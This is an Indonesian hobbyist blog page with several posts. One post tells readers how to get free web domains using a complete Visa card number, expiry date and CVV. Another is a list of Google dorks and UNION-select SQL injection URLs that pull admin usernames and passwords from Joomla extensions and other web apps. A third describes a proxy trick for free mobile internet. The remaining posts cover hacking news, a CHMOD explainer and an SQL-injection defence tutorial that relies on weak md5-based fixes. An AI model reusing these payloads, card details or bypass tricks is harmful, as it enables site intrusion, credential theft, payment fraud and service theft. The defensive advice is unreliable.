Welcome To My Blog =))

Domain Intuit Gratis 2013

Posted by : Edwin Farrel

JANGAN DIPERJUAL BELIKAN- 
UTAMAKAN SHARING :) NO PELIT
Mungkin ada yg lagi butuh domain .com.net.org.biz.name.info :) baca dokumen ini aja :D

1. pertama ke sini :p
2. http://www.homestead.com/~site/jws/googleSignupReducedSubmit.action
3. isi semua data" (emailnya ngasal gpp ,yg penting inget)
4. ceklist "I accept the following" dan "I would like to receive from Google"
5. Langsung continue> aja :)
6. ke bagian "domain" whois dlu ,kalo udh bisa ,get domain :)
7. nanti ke sini ,isi kaya gni http://prntscr.com/t7dsh ,submit aja
8. lanjut ke sini http://prntscr.com/t7dz5 ,"Domain Privacy" JANGAN DI CENTANG  . Centang  "I agree to the Terms of Service" ,submit
9. isi data" yg lengkap :)

Credit Card :
Type : Visa
4447962191113806 (VISA)
06 / 2014 (bulan/tahun)
514(CVV)

NB : -JANGAN DIPERJUAL BELIKAN-

Smoga Bermanfaat :*


Kamis, 21 Maret 2013 0 komentar

SQL Injection CMS Joomla

Posted by : Edwin Farrel

_____________________________________________________________
1. Google dork = allinurl:option=com_user |==========================
[x]. Cek Vuln
site/index.php?option=com_user&view=reset&layout=confirm

[x]. Cek UID n Pass Admin
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2
site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3

"sampai muncul tabel informasi"

[x]. Login
Site/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |
==============================
[x]. Cek Vuln
site/mod.php?mod=publisher&op=viewcat&cid=2'

[x]. Cek UID n Pass Admin
site/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),3+from+authors--

[x]. Login
site/admin.php
______________________________________________________________________
3. Google dork = inurl:com_gameserver |
========================
[x]. Cek Vuln
Site/index.php?option=com_gameserver&view=gamepanel&id=3'

[x]. Cek UID n Pass Admin
site/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,char(58),password),4+from+jos_users-–

[x]. Cek Login
site/path/path/path/admin
______________________________________________________________________
4. Google dork = inurl:com_digifolio |
======================
[x]. Cek Vuln
site/index.php?option=com_digifolio&view=project&id=2'

[x]. Cek UID n Pass Admin
site/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–

[x]. Cek Login
site/admin
______________________________________________________________________
5. Google dork = inurl:com_siirler |
====================
[x]. Cek Vuln
site/index.php?option=com_siirler&task=sdetay&sid=
3'

[x]. Cek UID n Pass Admin

site/index.php?option=com_siirler&task=sdetay&sid=
-3+union+all+select+1,2,concat(username,char(58),password),4+from+jos_users–-

[x]. Cek Login
site/admin
______________________________________________________________________
6. Google dork = Powered by PHP Live! v3.3 |
============================
[x]. Cek Vuln
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'

[x]. Cek UID n Pass Admin
site/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+chat_admin–


[x]. Cek Login
site/admin
______________________________________________________________________
7. Google dork = allinurl:option=com_livechat |
============================
[x]. Cek Vuln
site/administrator/components/com_livechat/getChat.php?chat=0&last=3'

[x]. Cek UID n Pass Admin
site/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),4+from+"masih jadi misteri!!"
______________________________________________________________________
8. Google dork = allinurl:com_idoblog |
[x]. Cek Vuln
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'

[x]. Cek UID n Pass Admin
site/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0×3a,username,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–

[x]. Cek Login
site/administrator

site/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= (SQL Injection Blind)



0 komentar

Trik Internet Gratis SmartFren 2013

Posted by : Edwin Farrel
halooo :))
kali ini saya ingin share cara trik internet gratis SmartFren 2013 =))

sebenernya sih saya ga pake smartfren :v tapi ya siapa tau ini bisa wkwkwkw :v

Download Alat


1. Install program ispce td, trus buka, beri centang pada query mode, dan kita atur listen portx 127 biar gampang nantinya. klik OK.

2. Coz domain yg hanya bisa diakses saat pulsa smart sob habis “nol” adalh smartfren.com, smart-telecom.co.id, dan jump.smart-telecom.co.id, jadi masuklah pd Query URL Configuration, pilih front query, trus masukkan salah satu domain tsb pd font query + simbol “@”.

3. Kita beralih pd proxy configuration, unk proxy server silahkan cari sendiri, dgn catatan proxy dgn port 80 dan 3128 yg hanya bisa dgunakan disini, coz pihak smartfren mungkin hanya membuka kedua port tsb. unk proxy cari di google sendiri ea ato ke hidemyass.com banyak koq.. cari yang fast proxy, biar liar larinyaaa,,, hehehehhe
Ato kalo gak pengen repot pake aja ne proxy, tp gak ane jamin, lemoootnya ampuuunnn..!!

4. Udahan dulu, klik REFRESH 3x, lalu minimize, jangan di-exit!!
next…
buka firefox. ke menu Options - Advanced - Network - Setting. Atur http proxy 127.0.0.1, dan gunakan listen portx yg tadi yaitu 127., berikan centang pd use this proxy………
kemudian kosongkan pd No proxy for.

dan silahkan menikmati yg gratisan.
Bagi sob yg daerahx sudah tercover EVDO n make perangkat (modem) yg mendukung kecepatan EVDO rev A ato rev B,. pihak smart tdk membatasi bandwidth (kecepatan), speed bisa mencapai 3.1 Mbps ato sekitar 396,8 kb per detik. (bedakan antara bit dgn byte, 1 bytes= 8 bit)
Unk daerah yg hanya trdapat jaringan CDMA 1x cuma bs donlot sampek 19 kb per detik. jadi yg sabar aja ya….. heheheh
NOTE :
1. Pertama, agar gratisan dapat digunakan pd browser chrome da IE, pd browser IE masuklah ke Internet Options - Connections, pilih pd koneksi yg sedang sob gunakan, klik Settings. Masukkan proxy dan portnya seperti pd firefox td. lalu klik OK. OK lagi. dan OK lagi.

Agar bisa dgunakan unk mendownload lewat IDM, pilih Download - Options - Proxy, berikan centang dan masukkan proxy di Use Http proxy. Klik OK.

2. Kedua, beberapa situs ato blog mungkin tidak dpt dbuka dg sempurna, ataupun tdk dpt dibuka sama sekali, misl: mail.google.com, mail.yahoo.com. coz menggunakan protokol HTTPS yg mungkin perluh make port selain yg ane cantumkan d ats.
Semoga Bermanfaat :)

Sumber : raybjm 















0 komentar

April,Hacker Anonymous (Bersatu) Berencana Menyerang Israel

Posted by : Edwin Farrel

Kelompok aktivis peretas (hacker) Anonymous berencana melancarkan serangan terorganisasi bernama #OpIsrael. Ini merupakan serangan cyber kepada Israel yang dimulai pada 7 April 2013 mendatang.

Anonymous meminta para peretas di seluruh dunia untuk bergabung dalam gerakan ini. Mereka punya misi "menghapus Israel dari internet."

"Tim hacker memutuskan untuk bersatu melawan Israel sebagai satu kesatuan, dan Israel harus siap menjadi pihak yang "terhapus" di internet. Ini bukan satu hacker, bukan satu tim hacker, tapi ini adalah kumpulan berbagai hacker," tulis kelompok Anonymous.

Mereka mengatakan, ini akan menjadi serangan siber terbesar yang pernah ditujukan untuk suatu negara. Dilihat dari daftar peretas yang bersedia bergabung, banyak yang berasal dari kawasan Timur Tengah.

Media massa Haaretz asal Israel melaporkan, pemerintah menanggapi serius ancaman ini dan menyiapkan pertahanan cyber negara. Direktur Kelompok Online Pemerintah Israel Ofir Ben Avi mengakui, #OpIsrael sedang diorganisasikan dalam beberapa hari terakhir. 

"Yang membedakan gerakan ini dengan serangan sebelumnya adalah, ini benar-benar dilakukan oleh kelompok Anonymous yang berafiliasi dari seluruh dunia yang bergabung jadi satu kekuatan," kata Ben Avi.
Rabu, 20 Maret 2013 0 komentar

Awal Mula Harlem Shake Mendunia

Posted by : Edwin Farrel


Akhir Juni tahun lalu, seorang disk jockey kurang terkenal di Brooklyn merilis lagu electronic dance music (EDM) berjudul Harlem Shake. Dia merilis lagu tersebut di website gratisan tanpa banyak keriuhan.

Tapi, di awal Februari 2013, Harlem Shaketelah menjadi fenomena massa selevel Psy, penyanyi Gangnam Style. Orang-orang dengan gaya apa dan latar belakang apa pun melakukan Harlem Shake.

Kini, di YouTube, telah ada lebih dari 100 ribuposting-an video Harlem Shake. Ketika Billboard mengubah kriteria lagu-lagu ngehit dengan memasukkan data YouTube dalam sepekan,Harlem Shake meroket menjadi nomor satu dalam daftar 100 lagu hot.

Hal yang lucu adalah video Harlem Shake milik Baauer sendiri tidak pernah ada. Di YouTube, yang ada hanya versi resmi dalam bentuk audio, yang telah dilihat orang 14 juta kali.

Nasib baik terjadi setelah versi dansa Harlem Shake, yang dibuat komedian Filthy Frank di YouTube, menjadi virus pada 2 Februari. VideoHarlem Shake versi Frank mencatat 17 juta penonton dan membuat ratusan ribu orang lainnya meniru dan membuat video Harlem Shake versi masing-masing. Bahkan ada lebih dari 70 video Harlem Shake yang dilihat sekurangnya 1 juta orang.

Karena YouTube mengizinkan artis, label rekaman, dan publisher untuk mengukur nilai uang dari lagu melalui layanan konten ID, Baauer akhirnya mampu meraih pendapatan dari versi orisinal dan dari versi cover-nya. Namun, beberapa orang yang berkecimpung di industri musik mengatakan bahwa aliran uang tidak akan bertahan. "Lebih baik tidak menghentikan pekerjaan sehari-hari mereka," kata Jamie Kitman, seorang manajer di OK Go.

Tapi, Matt Johnson, seorang musikus grup rock Matt and Kim, mengatakan, kemasyhuran Harlem Shake pantas ditujukan kepada Baauer. Dia pun mengaku menyukai lagu Harlem Shake. "Ada energi tertentu yang diciptakan dalam 30 detik yang merupakan bagian dari lagu dan video-video lainnya. Anda tidak perlu memiliki keterampilan menari atau belajar dengan rutinitas yang lama," kata dia.

Matt and Kim mem-posting video Harlem Shake versi sendiri pada 11 Februari lalu. Kini, video mereka telah dilihat oleh 9 juta penonton.

Semoga Bermanfaat :D
0 komentar

Mengatasi BUG Pada SQL Injection

Posted by : Edwin Farrel

"SQL Injection" yaitu trik hacking dengan cara mengedit isi dari variabel get yang ada di url untuk melakukan penetrasi kedalam database.. teknik SQL Injection juga bsa di lakukan pada form login dengan membaypass atau melewati autentikasi login dengan syntak SQL..

Eitss tpi dsni ane ga ngajarin cara hacking nya tpi cara bagaimana cara mengantisipasinya :)
[ga bole sma admin kampus] hohoho pissss..

okeh ini dia trik nya..
 
1. Dengan cara menjadikan variabel get menjadi absolute integer
    Penjelasan:
    Biasanya para hacker melakukan penetrasi terhadap variabel id yang kita letakkan pada url..
  
    Contoh:
    pada url http://webkamu/berita.php?id=1
    ketika akan membaca isi dari variabel id biasanya kita menggunakan syntak
   
    $id = $_GET['id'];
    jadi setiap isi dari id pada url akan disimpan pada variable $id..
   
    dan untuk query ke database :
    "SELECT * FROM tbl_berita WHERE id='$id'"
 
     nah melalui variabel $id ini lah para hacker menggunakan teknik SQL Injection, dengan   memasukkan perintah2 SQL yang dapat mengeksploitasi database..
 
    Solusinya:
    kita buat id menjadi absolute integer dengan mengubah sintaks pembacaan variabel get id menjadi:
    $id = abs((int)$_GET['id']);
 
    fungsi abs() digunakan untuk menghilangkan tipe data minus dan int digunakan untuk mengubah tipe data menjadi integer (hanya mengijinkan tipe data integer). jadi ketika variabel id pada url di rubah secara manual dan diisi dengan sintak SQL yang berupa string maka tetap dibaca 0.  
 
 
2. Dengan menambahkan variabel get berisi enkripsi md5 yg divariasi pada url
     jika awal url adalah
     http://webkamu/berita.php?id=1
 
   maka kita akan menambahkan variabel yg berisi enkripsi dari id yg kita modifikasi dengan string acak menjadi
     http://webkamu/berita.php?id=1&token=9b0443e36affedbafe882a4bbb90eaec
 
nah sekilas terlihat mirip sma url2 facebook.. wahh kereeen :)

ok, saya jelaskan maksud dari variabel token diatas, jadi ketika awal kita memberikan link untuk next berita or previous berita atau berita lainnya.. pokok nya yang menampilkan berita lain dah.. kita isi
$token = md5(md5($id_berita).md5('kata acak'));
jadi href nya menjadi : berita.php?id=$id_berita&token=$token
 
sekarang pada halaman tampil berita kita tambahkan pengecekan apakah id berita diganti/diinject manual oleh user dengan cara :
 
$id_berita=$_GET['id_berita'];
$token=$_GET['token'];
$cek=md5(md5($id_berita).md5('kata acak'));
if($token==$cek){
   //syntak menampilkan berita disini
}
else{
   echo "SQL Injection detected..!!!!";
}
 
nah slsai deh,, hehehe
bingung..??? semoga ngga deh yha.. klo bingung boleh dah rokoknya di isep dlu.. hehe (tpi jangan deket2 ma ane yha gan, ane ga ngerokok) pisssss..!!!
 
 
3. Khusus untuk form login, dengan melakukan enkripsi password atau merubah algoritma autentikasi login.
    biasanya kita melakukan pengecekan ketika user login yaitu dengan melakukan query kedatabase:
 
$input_username=$_POST[username];
$input_password=$_POST[password];
 
$q="SELECT * FROM tbl_user where username='$input_username' and password='$input_passsword'";
$r=mysql_query($q);
$jml_row=mysql_num_rows($r);
if($jml_row > 0){
     echo "login sukses";
}
else{
     echo "login gagal";
}
 
nah algoritma autentikasi login seperti diatas sangat rentan terhadap penetrasi SQL Injection..
solusi pertama dengan melakukan enkripsi pada password yaitu dengan mengganti
skrip berikut :
 
$input_password=$_POST[password]; menjadi:
$input_password=md5(md5($_POST[password]).md5('karakter acak'));
 
tentunya yang berakibat dengn mengenkripsi semua password di database sesuai enkripsi diatas.. :)
 
(semoga ga pada pusing yah :D)
 
solusi kedua yaitu dengan merubah algoritma menjadi
 
$d=mysql_fetch_array($r);
if($jml_row >0 && ($d[password]==$input_password))            << di tambah pengecekan inputan password thd password di dtabase

SUMBER : http://10511902.blog.unikom.ac.id/mengatasi-mencegah.33w

Semoga Bermanfaat :D
0 komentar

Pengertian CHMOD

Posted by : Edwin Farrel
Kali ini , saya akan share apa itu CHMOD , mungkin kalian para pengelola website yang sering bulak balik masuk keluar cpanel akan mengenal kata "CHMOD" , nah disini kalian akan penasaran apa itu CHMOD .
Yu kita langsung ke pembahasan


CHMOD
#CHMOD berguna untuk menambahkan atau mengurangi ijin pemakai untuk mengakses file atau direktory


CHMOD dibagi menjadi 2 pemahaman
-Sistem numeric coding
-Sistem letter coding

Sekarang kalian akan mengenal objek objek CHMOD , hehe
-r : untuk membaca (read)
-w : untuk menulis (write)
-x : untuk mengeksekusi (execute)

Keterangan numeric dari sebuah file permission
numeric nya dibagi menjadi 4
0 : yang artinya tidak ada operasi (null/hidden)
1 : yang artinya mengijinkan untuk melakukan eksekusi (execute)
2 : yang artinya menginjinkan untuk menulis (write)
4 : yang artinya mengijinkan untuk membaca (read)


Setiap File/Direktory memiliki 3 susunan dalam perijinan
-owner
-group
-user


Untuk membuat batasan-batasan pada suatu file,
kita harus membuat suatu permisi file tersebut dengan cara mensetting “CHMOD “ agar materi dari web kita lebih bisa terlindungi dan tertata dengan semestinya. Berikut sebagai contoh :

Misalkan direktori “home” kita mempunyai default permisi  711 maka itu artinya :



7 = 4+2+1 : sahabat (pemilik / owner / admin ) diperkenankan untuk membaca,menulis dan mengeksekusi file/ direktori.
1 = 1 : semua user di group sahabat hanya diperkenankan  melakukan tindakan  execute tapi tidak diperkenankan membaca dan menulis. file/ direktori.
1 = 1 : semua user bukan group sahabat dapat melakukan execute tapi tidak membaca dan menulis file/ direktori.

Misalkan direktori public_html kita mempunyai permisi 755 artinya :



7 = 4+2+1 : sahabat  (pemilik / owner / admin ) diperkenankan untuk membaca ,menulis dan mengeksekusi file/ direktori.
5 = 4+1 : semua user di group sahabat hanya diperkenankan  membac dan melakukan execute  tapi tidak dipekenankan untuk menulis.
5 = 4+1 : semua user bukan group sahabat diperkenankan untuk membaca dan melakukan tindakan execute tapi tidak diperkenankan menulis.

Files sahabat untuk  direktori public_html  setidaknya  harus mempunyai permission value untuk file adalah
644 (dan direktorinya direktorinya harus 755 ) atau WWW server tidak akan bisa membaca nya sehingga weblog tidak akan tampil pada jendela  web browser.

Chmod Value untuk permission file “index html” adalah = 644

chmod Value untuk membuat direktori images dan isi file dapat  di baca oleh semua user yaitu :

chmod   value :  755 untuk  file images
chmod   value : 644 direktori image

untuk meng hidden suatu file maka :

chmod 700 nama_file
0 komentar
Diberdayakan oleh Blogger.

My Blog List


Copyright © 2012 All About Technology | Naruto Vs Sasuke V2 Theme | Designed by Johanes DJ